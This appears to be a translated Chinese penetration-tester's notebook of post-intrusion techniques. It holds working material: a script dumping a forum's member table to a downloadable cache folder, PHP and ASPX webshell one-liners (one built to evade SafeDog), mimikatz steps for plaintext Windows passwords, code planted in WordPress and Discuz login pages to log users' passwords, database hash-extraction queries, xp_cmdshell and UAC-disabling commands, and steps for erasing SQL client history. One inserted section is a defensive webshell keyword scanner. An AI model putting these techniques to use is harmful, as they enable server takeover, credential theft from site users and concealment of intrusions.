// Pasted into the one-liner client's expert mode (no <?php tag needed there):
// dump the members table in 500-row chunks into the forum's cache directory,
// from where the files can be downloaded over HTTP.
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
// connect over the local UNIX socket (host given as ":/path/to/socket") with the forum's own credentials
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz", $connx) or die("Could not select database: " . mysql_error());
$result = mysql_query("SELECT * FROM members", $connx) or die("Query failed: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i + 1;
    $tmp .= implode("::", $row) . "\n";
    if (!($i % 500)) { // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user' . intval($i / 500) . '.txt';
        file_put_contents($filename, $tmp);
        $tmp = '';
    }
}
// rows left after the last full chunk of 500 (the original dropped these)
if ($tmp !== '') {
    file_put_contents('/home/httpd/bbs.xxxxx/forumdata/cache/user' . (intval($i / 500) + 1) . '.txt', $tmp);
}
mysql_free_result($result);

// delete the dump files after downloading them
ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while ($i < 32) {
    $i = $i + 1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user' . $i . '.txt';
    @unlink($filename);
}
httprint: operating-system fingerprinting
Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org   identifies the name servers, gathering DNS information
host -l www.owasp.org ns1.secure.net   attempts a zone transfer for owasp.org
Netcraft DNS search service: http://searchdns.netcraft.com/?host
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)
MSN search: http://search.msn.com   syntax: "ip:x.x.x.x" (without the quotes)
Webhosting info: http://whois.webhosting.info/   syntax: http://whois.webhosting.info/x.x.x.x
DNSstuff: http://www.dnsstuff.com/ (several services available)
http://net-square.com/msnpawn/index.shtml (requires installation)
tomDNS: http://www.tomdns.net/ (some services are still non-public)
SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Fix for the "Data too long for column 'username' at row 1" error when importing a database: the connection character set does not support Chinese.
MySQL password change:
UPDATE mysql.user SET password=PASSWORD("newpass") WHERE user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-line backdoors
Many advanced PHP one-liners turned up during intrusions. They are recorded here so they can be found and removed by keyword later.
1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// Caidao (China Chopper) one-liner: the function name is assembled from single characters so "preg_replace" never appears literally, and the /e modifier evaluates the replacement as PHP
2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include: any file named in the request is parsed and run as PHP
3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// copies an uploaded file to any name (an upload backdoor)
4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// Caidao one-liner, the same as 1 under a different variable name
5. include ($uid);
// dangerous include, the same as 2, with the path arriving via POST
// one-liner embedded in a GIF
6. Typical one-liners
Backdoor code
<?php eval($_POST[sb])?>
Code
<?php @eval($_POST[sb])?>
// error-suppressed variant
Code
<?php assert($_POST[sb]);?>
// runs arbitrary PHP statements through the lanker one-liner client's expert mode
Code
<?$_POST['sa']($_POST['sb']);?>
Code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// for this one, enter the following in the "config" field when setting up the connection in the Caidao client
Code
<O>h=@eval($_POST[c]);</O>
Code
<script language="php">@eval($_POST[sb])</script>
// one-liner that gets around a filter on <?
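A keyword scanner for the samples above, added here as an example and not part of the original post: it turns the patterns seen in these one-liners (eval/assert on request input, preg_replace with /e, function names built from single characters, include of a request-controlled variable, $_POST[x](...) variable functions, the ${@eval} interpolation trick, the <script language="php"> wrapper, and the JScript/ASP.NET variants) into per-line rules and reports which files trip them. The sample files are constructed from the one-liners in this section plus one benign file as a control; the rule names and regular expressions are this example's own and only catch these forms, so a hit is something to read, not a verdict.

```python
import re

# Signatures derived from the one-liners collected above. Each rule is (name, regex) applied per line;
# this is a triage aid, not a complete webshell signature set.
RULES = [
    ("eval/assert on request input",
     re.compile(r"\b(?:eval|assert)\s*\(\s*@?\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("preg_replace with /e modifier (replacement is executed as PHP)",
     re.compile(r"""preg_replace\s*\(\s*["']/.*?/[a-z]*e[a-z]*["']""", re.I)),
    ("function name assembled from single-character strings",
     re.compile(r"""(?:"\w"|'\w')(?:\s*\.\s*(?:"\w"|'\w')){2,}""")),
    ("variable function called with request input",
     re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(", re.I)),
    ("eval hidden inside string interpolation",
     re.compile(r"\$\{\s*@?eval\b", re.I)),
    ("PHP code inside <script language=\"php\">",
     re.compile(r"""<script\s+language\s*=\s*["']php["']""", re.I)),
    ("uploaded temp file copied to a caller-chosen name",
     re.compile(r"""\$_FILES\s*\[[^\]]*\]\s*\[\s*["']?tmp_name""", re.I)),
    ("ASP.NET/JScript one-liner: eval or Assembly.Load on request data",
     re.compile(r"(?:\beval\s*\(\s*Request\.|Assembly\.Load\s*\(\s*Request\.BinaryRead)", re.I)),
]
ASSIGN_FROM_REQUEST = re.compile(r"\$(\w+)\s*=\s*@?\$_(?:GET|POST|REQUEST|COOKIE)\s*\[")
INCLUDE_VAR = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)", re.I)
SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE"}


def scan(source):
    """Return sorted (line_number, rule_name) hits for the contents of one file."""
    hits = []
    tainted = set()   # variables assigned directly from a request superglobal earlier in the file
    for n, line in enumerate(source.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((n, name))
        for m in ASSIGN_FROM_REQUEST.finditer(line):
            tainted.add(m.group(1))
        m = INCLUDE_VAR.search(line)
        if m:
            var = m.group(1)
            if var in SUPERGLOBALS or var in tainted:
                hits.append((n, "include of a request-controlled path"))
            else:
                hits.append((n, "include of a variable path (check its origin)"))
    return sorted(hits)


def flagged(files):
    """Names of the files in {name: contents} that produced at least one hit."""
    return {name for name, src in files.items() if scan(src)}


# Constructed samples: the one-liners from this section, plus one benign file as a control
SAMPLES = {
    "cfg.php": '<?php\n$telok = "0${@eval($_POST[xxoo])}";\n$username = "123456";\n?>',
    "s1.php": '<?php\n$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";\n$hh("/[discuz]/e",$_POST[\'h\'],"Access");',
    "s2.php": "<?php\n$filename=$_GET['xbid'];\ninclude ($filename);",
    "s3.php": '<?php\n$reg="c"."o"."p"."y";\n$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);',
    "s5.php": "<?php\ninclude ($uid);",
    "s6.php": "<?php @eval($_POST[sb])?>",
    "s7.php": "<?php assert($_POST[sb]);?>",
    "s8.php": "<?$_POST['sa']($_POST['sb']);?>",
    "s9.php": '<?php\n@preg_replace("/[email]/e",$_POST[\'h\'],"error");\n?>',
    "s10.php": '<script language="php">@eval($_POST[sb])</script>',
    "rss.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "clean.php": '<?php\n$u = htmlspecialchars($_POST["user"]);\necho "Hello, " . $u;\n?>',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        for line_no, rule in scan(src):
            print("%s:%d: %s" % (name, line_no, rule))
```

Run it over a web root by reading each .php/.aspx file into scan(); the include rule is deliberately two-tiered so that include of a variable assigned from $_GET earlier in the same file ranks above include of an unexplained variable, which still deserves a look (register_globals era code passes request data that way).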
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory and run psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the plaintext password
7. Use exit to quit; do not just close the window, or the system will crash.
http://www.monyer.com/demo/monyerjs/ fairly complete JS decoding site
Automatically check for high-risk system patches (prints every KB in the list that systeminfo does not show as installed):
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
One-line aspx backdoor that gets past SafeDog (安全狗); the whole payload arrives as an assembly in the request body, so nothing suspicious appears in the file itself beyond the Assembly.Load call:
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell, to help with further social engineering.
Add the following around line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
The logging code runs when action=login; it can equally be placed in the default branch of the switch...case statement.
That is, search for case 'login'
and insert the code directly under it; the captured passwords end up in pwd.txt.
Modifying wp-login.php is not really a good approach, as it is easy to spot; there are other methods, noted here for the record.
Bypassing SafeDog with the IIS 6 file-parsing vulnerability, using a filename of the form:
;antian365.asp;antian365.jpg
Grabbing password hashes from various databases to crack the highest-privilege account
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case-sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper-case hash
Crack the upper-case hash in Cain & Abel first, then work out the case-sensitive hash from it.
SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa';
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case-sensitive hash
Crack the case-sensitive hash in Cain; try brute force and dictionary attacks.
Update, following Bernardo's comments:
use fn_varbintohexstr() to cast the password to a hex string, e.g.
select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins
MySQL:
In MySQL you can generate hashes internally using the PASSWORD(), MD5() or SHA1() functions. PASSWORD() is the function used for MySQL's own user authentication system. It returns a 16-character hex string for MySQL versions prior to 4.1, and a 41-character string (based on a double SHA-1 hash) for versions 4.1 and up. MD5() is available from MySQL version 3.23.2 and SHA1() was added later in 4.0.2.
*mysql < 4.1
mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+
*mysql >= 4.1
mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+
Select user, password from mysql.user
The hashes can be cracked in Cain & Abel.
Postgres:
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser (usually called "postgres" or "pgsql") to read this table.
select usename, passwd from pg_shadow;
usename  | passwd
---------+------------------------------------
testuser | md5fabb6d7172aadfda4753bf0507ed4396
Use MDCrack to crack these hashes (the stored value is MD5(password + username), hence --append=testuser):
$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396
Oracle:
select name, password, spare4 from sys.user$
The hashes can be cracked with Cain & Abel or thc-orakelcrackert11g.
More on Oracle later, I am a bit bored....
Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing the SQL Server 2008 connection history kept by the client tools; back it up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete it here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
For versions before SQL Server 2008:
SQL Server 2005:
delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
clear the relevant entries under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\ in the registry.
This post was last edited by simeon on 2013-1-3 09:51.
Changing file permissions on Windows 2008
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First check whether the right-click menu has a "管理员取得所有权" (take ownership as administrator) entry; if it does not, import the following .reg file:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
Importing this .reg adds "管理员取得所有权" to the Win7 right-click menu (takeown transfers ownership, icacls then grants Administrators full control; the Directory entries do it recursively).
II. Search C:\Windows for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui":
1. The "notepad.exe" in C:\Windows does not need replacing
2. The "notepad.exe" in C:\Windows\System32 does not need replacing
3. Ignore the four "notepad.exe.mui"
4. The ones to replace are the "notepad.exe" under C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
To replace them, first take ownership of these two folders as administrator, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders.
Afterwards go back to the desktop, create a new txt file and open it to see whether the editor has changed.
Disabling the security policy (UAC) on Windows 2008 by setting EnableLUA to 0:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Edit client.php in the uc_client directory and insert the code below directly after the line
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
It then writes csslog.php under the site's ./data/cache/ directory automatically.
You can also add a view.php under the ipdata directory to read the records; its password is falw.
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
// the leading <?exit();?> stops the log from being shown if csslog.php is requested directly
$record="<?exit();?>User:".$username." Password:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);